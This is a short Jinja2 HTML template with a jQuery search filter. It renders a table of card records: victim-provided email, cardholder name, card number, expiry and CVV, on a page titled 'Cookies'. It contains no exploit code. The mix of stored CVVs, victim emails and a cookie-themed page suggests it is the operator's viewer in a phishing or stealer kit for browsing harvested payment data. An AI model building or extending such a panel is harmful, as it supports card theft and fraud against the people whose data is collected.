{% extends "base.html" %}

{% block title %} Cookies {% endblock %}

{% block contents %}
<div class="form-inline">
    <label for="cards-search"> Search through cards: </label>
    <input id="cards-search" type="text" class="form-control search-tables" placeholder="Search for a card">
</div>

<table class="table table-bordered table-striped">
    <thead>
        <tr>
            <th scope="col"> # </th>
            <th scope="col"> Provided Email </th>
            <th scope="col"> Card Name </th>
            <th scope="col"> Card # </th>
            <th scope="col"> Exp Month </th>
            <th scope="col"> Exp Year </th>
            <th scope="col"> CVV </th>
        </tr>
    </thead>
    <tbody id="cards-table">
        {% for card in cards %}
        <tr class="wrap-word">
            <th scope="row"> {{ loop.index }} </th>
            <td> {{ card[1] }}</td>
            <td> {{ card[2] }}</td>
            <td> {{ card[3] }}</td>
            <td> {{ card[4] }}</td>
            <td> {{ card[5] }}</td>
            <td> {{ card[6] }}</td>
        </tr>
        {% endfor %}
    </tbody>
</table>
{% endblock %}

{% block scripts %}
<script>
    $(document).ready(function () {
        $("#cards-search").on("keyup", function () {
            var value = $(this).val().toLowerCase();
            $("#cards-table tr").filter(function () {
                $(this).toggle($(this).text().toLowerCase().indexOf(value) > -1)
            });
        });
    });
</script>
{% endblock %}